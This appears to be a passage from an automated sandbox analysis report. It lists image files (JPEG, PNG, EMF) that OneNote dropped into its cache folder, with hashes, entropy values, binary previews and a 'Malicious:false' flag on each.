                                                                                                                                            SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AK.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59832
                                                                                                                                            Entropy (8bit):7.308211468398169
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                            MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                            SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                            SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                            SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AM.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33032
                                                                                                                                            Entropy (8bit):2.941351060644542
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
                                                                                                                                            MD5:ACF4A9F470281F475EA45E113E9FB009
                                                                                                                                            SHA1:B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
                                                                                                                                            SHA-256:5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
                                                                                                                                            SHA-512:998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AN.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12180
                                                                                                                                            Entropy (8bit):5.318266117301791
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
                                                                                                                                            MD5:5C859FF69B3A271A9AAB08DFA21E8894
                                                                                                                                            SHA1:3156302A7450ADFF4D1B6EC893E955D3764D4DD4
                                                                                                                                            SHA-256:B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
                                                                                                                                            SHA-512:4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AP.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 39 x 600, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2104
                                                                                                                                            Entropy (8bit):7.252780160030615
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
                                                                                                                                            MD5:F6C596F505504044DF1E36BA5DA3F09B
                                                                                                                                            SHA1:BCF17EC408899B822492B47E307DE638CC792447
                                                                                                                                            SHA-256:EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
                                                                                                                                            SHA-512:E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AR.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14177
                                                                                                                                            Entropy (8bit):5.705782002886174
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                            MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                            SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                            SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                            SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AT.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):36740
                                                                                                                                            Entropy (8bit):7.48266872907324
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
                                                                                                                                            MD5:9C205C8D770516C5AA70D31B2CA00AF3
                                                                                                                                            SHA1:9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
                                                                                                                                            SHA-256:E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
                                                                                                                                            SHA-512:A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AV.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):53259
                                                                                                                                            Entropy (8bit):7.651662052139301
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                            MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                            SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                            SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                            SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B1.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60924
                                                                                                                                            Entropy (8bit):7.758472758205366
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
                                                                                                                                            MD5:D58C51D2CF586A5E14A9EC8529C3B0A8
                                                                                                                                            SHA1:F4811A353797C29B1E3F5A61B125C46E1534D587
                                                                                                                                            SHA-256:F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
                                                                                                                                            SHA-512:34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.........................................................yK..xd...6..|%....\j..e.=...Y..f..I.|-....e...$R.j.......~.W#....{.....V.k.|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.......................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B3.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 39 x 579, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):515
                                                                                                                                            Entropy (8bit):6.740133870626016
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
                                                                                                                                            MD5:E96BE30D892A5412CF262FEE652921CA
                                                                                                                                            SHA1:8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
                                                                                                                                            SHA-256:0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
                                                                                                                                            SHA-512:D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B5.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 30 x 700, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1547
                                                                                                                                            Entropy (8bit):6.4194805172468286
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
                                                                                                                                            MD5:0BA36A74DFBF411FAB348404CCEC3348
                                                                                                                                            SHA1:4C619790E517416E178161028987DF1CD3B871CC
                                                                                                                                            SHA-256:2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
                                                                                                                                            SHA-512:90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B7.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):95763
                                                                                                                                            Entropy (8bit):7.931689087616878
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
                                                                                                                                            MD5:177DD42CA99CAA2CCBF2974221680334
                                                                                                                                            SHA1:35FD86B3DD082A6D4930C67BC0E05D3B5817465A
                                                                                                                                            SHA-256:525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
                                                                                                                                            SHA-512:6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.*c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=|..`2. v..t......U*.8.u.. ...'...*...2;u....& 3..$.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B9.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67991
                                                                                                                                            Entropy (8bit):7.870481231782746
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
                                                                                                                                            MD5:1271B1905D18A40D79A5B9DB27EE97EA
                                                                                                                                            SHA1:9618608FBD7342DE6C71220A36C3F4995BA9C13E
                                                                                                                                            SHA-256:5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
                                                                                                                                            SHA-512:C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi*.k..?#..._...X..R.&]..[..;../]L..f..V......*.e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BB.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22203
                                                                                                                                            Entropy (8bit):6.977175130747846
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                            MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                            SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                            SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                            SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BD.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15740
                                                                                                                                            Entropy (8bit):6.0674556182683945
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                            MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                            SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                            SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                            SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BF.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):86187
                                                                                                                                            Entropy (8bit):7.951356272886186
